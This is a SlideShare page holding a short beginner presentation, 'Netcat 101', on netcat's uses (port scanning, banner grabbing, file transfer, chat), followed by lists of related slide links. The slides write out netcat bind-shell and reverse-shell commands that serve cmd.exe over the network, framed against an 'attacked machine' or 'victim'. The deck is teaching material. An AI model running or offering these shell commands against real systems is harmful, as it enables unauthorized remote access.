SlideShare uma empresa Scribd logo

Netcat 101 by-mahesh-beema

R
Raghunath G
Tecnologia
1 de 11
Baixar para ler offline
- - by Mahesh Bheema
 It is a tool that can read and write data across networks, usingTCP or UDP protocol. It can be operated both in server and client mode.
 Port scanning  Banner Grabbing  Backdoor  File transfer  Port Redirector  Chatting and  Many more…
 Port scanning is the process of scanning a specified host and looking for ports that may be open or closed.  Here is the syntax to scan ports… # nc -v -z IP_Address port_range -v is for verbosity (without –v it wont display result in output)
 Banner grabbing is a technique to determine the service running or application, version, operating system. Using the below syntax : # nc -v IP_Address port  when you hit enter,After a few seconds you see some information about your IP address and port number, then write GET / HTTP/1.1 and hit enter and see some information about your victim.
 File transfer/ chat works by setting up a server and client.  FileTransfer  nc –l –p 1234 > testfile.txt [Reciever’s end]  nc IP_Address 1234 < testfile.txt [Sender’s end]  type abc.jpeg | nc –lvp 8080  nc –l Server_IP 8080 > abc.jpeg  Chat Server  nc –l –p 1234 [Reciever’s end]  nc IP_Address 1234 [Sender’s end]
 Netcat has the ability of providing a remote shell as well. We can do this in two ways…  1. Bind Shell  2. Reverse Shell
 We can take cmd.exe/shell and bind it to a local port, and anyone connecting to this port will be presented with command prompt belonging to that machine.This is known as a BIND SHELL. Syntax as follows…  # nc –l -p 1337 –e cmd.exe [Server]  # nc –v Server_IP 1337 [Client]
 Reverse Shell:  Netcat can also "send" a shell to another instance of a listening Netcat session.This is especially useful if the attacked machine is behind a firewall or otherwise nat'ed  # nc –lvp 1337 [Server]  # nc –v Server_IP 1337 –e cmd.exe [Client]
 It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺
 SpecialThanks to CATechnologies for the venue.

Recomendados

Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army ToolChandrapal Badshah
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metasploit
MetasploitMetasploit
MetasploitInstitute of Information Security (IIS)
 
Netcat
NetcatNetcat
Netcatpenetration Tester
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 

Recomendados

Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army ToolChandrapal Badshah
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metasploit
MetasploitMetasploit
MetasploitInstitute of Information Security (IIS)
 
Netcat
NetcatNetcat
Netcatpenetration Tester
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt ScannerFlorian Roth
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitGTU
 
Port scanning
Port scanningPort scanning
Port scanningHemanth Pasumarthi
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptxVivek Chauhan
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Metaploit
MetaploitMetaploit
MetaploitAjinkya Pathak
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
NMAP
NMAPNMAP
NMAPPrateekAryan1
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Network scanning
Network scanningNetwork scanning
Network scanningMD SAQUIB KHAN
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitableMohammed Akbar Shariff
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scannern|u - The Open Security Community
 
Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Internet Security Auditors
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Sumutiu Marius
 

Mais conteúdo relacionado

Mais procurados

01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitGTU
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptxVivek Chauhan
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 

Mais procurados (20)

THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt Scanner
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Port scanning
Port scanningPort scanning
Port scanning
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
 
Metasploit
MetasploitMetasploit
Metasploit
 
NMAP
NMAPNMAP
NMAP
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Network scanning
Network scanningNetwork scanning
Network scanning
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
 

Destaque

Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Internet Security Auditors
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Sumutiu Marius
 
The Dark Arts of Hacking.
The Dark Arts of Hacking.The Dark Arts of Hacking.
The Dark Arts of Hacking.Sumutiu Marius
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Mobile application security 101
Mobile application security 101Mobile application security 101
Mobile application security 101Raghunath G
 
88001174636 Marvella city in haridwar
88001174636 Marvella city in haridwar 88001174636 Marvella city in haridwar
88001174636 Marvella city in haridwar Marvella city
 
Marvella city a complete township in haridwar
Marvella city a complete township in haridwarMarvella city a complete township in haridwar
Marvella city a complete township in haridwarMarvella city
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
World Cup! Young Germany Guest Blogging
World Cup! Young Germany Guest BloggingWorld Cup! Young Germany Guest Blogging
World Cup! Young Germany Guest Bloggingsteffan
 
New living and working
New living and workingNew living and working
New living and workingJames Lavigne
 
The Art of Social Media: Tips & Tricks
The Art of Social Media: Tips & TricksThe Art of Social Media: Tips & Tricks
The Art of Social Media: Tips & Trickssteffan
 
Investor alert—investment scams exploit immigrant investor program
Investor alert—investment scams exploit immigrant investor programInvestor alert—investment scams exploit immigrant investor program
Investor alert—investment scams exploit immigrant investor programJames Lavigne
 
Buying a business in florida
Buying a business in floridaBuying a business in florida
Buying a business in floridaJames Lavigne
 

Destaque (20)

Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86 Creacion de shellcodes para Exploits en Linux/x86
Creacion de shellcodes para Exploits en Linux/x86
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.
 
The Dark Arts of Hacking.
The Dark Arts of Hacking.The Dark Arts of Hacking.
The Dark Arts of Hacking.
 
Shellcode mastering
Shellcode masteringShellcode mastering
Shellcode mastering
 
Exploitation
ExploitationExploitation
Exploitation
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Mobile application security 101
Mobile application security 101Mobile application security 101
Mobile application security 101
 
88001174636 Marvella city in haridwar
88001174636 Marvella city in haridwar 88001174636 Marvella city in haridwar
88001174636 Marvella city in haridwar
 
Marvella city a complete township in haridwar
Marvella city a complete township in haridwarMarvella city a complete township in haridwar
Marvella city a complete township in haridwar
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
 
World Cup! Young Germany Guest Blogging
World Cup! Young Germany Guest BloggingWorld Cup! Young Germany Guest Blogging
World Cup! Young Germany Guest Blogging
 
New living and working
New living and workingNew living and working
New living and working
 
SAmador CV
SAmador CVSAmador CV
SAmador CV
 
The Art of Social Media: Tips & Tricks
The Art of Social Media: Tips & TricksThe Art of Social Media: Tips & Tricks
The Art of Social Media: Tips & Tricks
 
Investor alert—investment scams exploit immigrant investor program
Investor alert—investment scams exploit immigrant investor programInvestor alert—investment scams exploit immigrant investor program
Investor alert—investment scams exploit immigrant investor program
 
Buying a business in florida
Buying a business in floridaBuying a business in florida
Buying a business in florida
 

Semelhante a Netcat 101 by-mahesh-beema

8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate028c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02Anand Nandani
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdforderfabfirki
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Nikhil Raj
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAn Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAbhishek Kumar
 
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To UseNagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To UseNagios
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 

Semelhante a Netcat 101 by-mahesh-beema (20)

8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate028c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
 
Netcat
NetcatNetcat
Netcat
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
F5 tcpdump
F5 tcpdumpF5 tcpdump
F5 tcpdump
 
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAn Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To UseNagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Cheatsheet: Netcat
Cheatsheet: NetcatCheatsheet: Netcat
Cheatsheet: Netcat
 
Netcat cheat sheet
Netcat cheat sheetNetcat cheat sheet
Netcat cheat sheet
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Netcat cheat sheet_v1
Netcat cheat sheet_v1Netcat cheat sheet_v1
Netcat cheat sheet_v1
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Client server
Client serverClient server
Client server
 

Mais de Raghunath G

Securitynewsbytes
SecuritynewsbytesSecuritynewsbytes
SecuritynewsbytesRaghunath G
 
Whats app forensic
Whats app forensicWhats app forensic
Whats app forensicRaghunath G
 
Seh based exploitation
Seh based exploitationSeh based exploitation
Seh based exploitationRaghunath G
 
Securitynewsbytes april2015-150418153901-conversion-gate01
Securitynewsbytes april2015-150418153901-conversion-gate01Securitynewsbytes april2015-150418153901-conversion-gate01
Securitynewsbytes april2015-150418153901-conversion-gate01Raghunath G
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdfRaghunath G
 
Security News Bytes
Security News BytesSecurity News Bytes
Security News BytesRaghunath G
 
Is iso 27001, an answer to security
Is iso 27001, an answer to securityIs iso 27001, an answer to security
Is iso 27001, an answer to securityRaghunath G
 
Null HYD Playing with shodan null
Null HYD Playing with shodan nullNull HYD Playing with shodan null
Null HYD Playing with shodan nullRaghunath G
 
Newsbytes_NULLHYD_Dec
Newsbytes_NULLHYD_DecNewsbytes_NULLHYD_Dec
Newsbytes_NULLHYD_DecRaghunath G
 
Null July - OWTF - Bharadwaj Machiraju
Null July - OWTF - Bharadwaj MachirajuNull July - OWTF - Bharadwaj Machiraju
Null July - OWTF - Bharadwaj MachirajuRaghunath G
 
Security News Bytes
Security News BytesSecurity News Bytes
Security News BytesRaghunath G
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaRaghunath G
 
Social engineering by-rakesh-nagekar
Social engineering by-rakesh-nagekarSocial engineering by-rakesh-nagekar
Social engineering by-rakesh-nagekarRaghunath G
 
The art of_firewalking-by-sujay
The art of_firewalking-by-sujayThe art of_firewalking-by-sujay
The art of_firewalking-by-sujayRaghunath G
 
Heartbleed by-danish amber
Heartbleed by-danish amberHeartbleed by-danish amber
Heartbleed by-danish amberRaghunath G
 

Mais de Raghunath G (20)

Securitynewsbytes
SecuritynewsbytesSecuritynewsbytes
Securitynewsbytes
 
Whats app forensic
Whats app forensicWhats app forensic
Whats app forensic
 
Seh based exploitation
Seh based exploitationSeh based exploitation
Seh based exploitation
 
Securitynewsbytes april2015-150418153901-conversion-gate01
Securitynewsbytes april2015-150418153901-conversion-gate01Securitynewsbytes april2015-150418153901-conversion-gate01
Securitynewsbytes april2015-150418153901-conversion-gate01
 
Raspberry pi 2
Raspberry pi 2Raspberry pi 2
Raspberry pi 2
 
Analysis of malicious pdf
Analysis of malicious pdfAnalysis of malicious pdf
Analysis of malicious pdf
 
Security News Bytes
Security News BytesSecurity News Bytes
Security News Bytes
 
Is iso 27001, an answer to security
Is iso 27001, an answer to securityIs iso 27001, an answer to security
Is iso 27001, an answer to security
 
Null HYD Playing with shodan null
Null HYD Playing with shodan nullNull HYD Playing with shodan null
Null HYD Playing with shodan null
 
Null HYD VRTDOS
Null HYD VRTDOSNull HYD VRTDOS
Null HYD VRTDOS
 
Metasploit
MetasploitMetasploit
Metasploit
 
Newsbytes_NULLHYD_Dec
Newsbytes_NULLHYD_DecNewsbytes_NULLHYD_Dec
Newsbytes_NULLHYD_Dec
 
Null dec 2014
Null dec 2014Null dec 2014
Null dec 2014
 
Null July - OWTF - Bharadwaj Machiraju
Null July - OWTF - Bharadwaj MachirajuNull July - OWTF - Bharadwaj Machiraju
Null July - OWTF - Bharadwaj Machiraju
 
Security News Bytes
Security News BytesSecurity News Bytes
Security News Bytes
 
Decoy documents
Decoy documentsDecoy documents
Decoy documents
 
Spear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishnaSpear phishing attacks-by-hari_krishna
Spear phishing attacks-by-hari_krishna
 
Social engineering by-rakesh-nagekar
Social engineering by-rakesh-nagekarSocial engineering by-rakesh-nagekar
Social engineering by-rakesh-nagekar
 
The art of_firewalking-by-sujay
The art of_firewalking-by-sujayThe art of_firewalking-by-sujay
The art of_firewalking-by-sujay
 
Heartbleed by-danish amber
Heartbleed by-danish amberHeartbleed by-danish amber
Heartbleed by-danish amber
 

Último

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Último (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
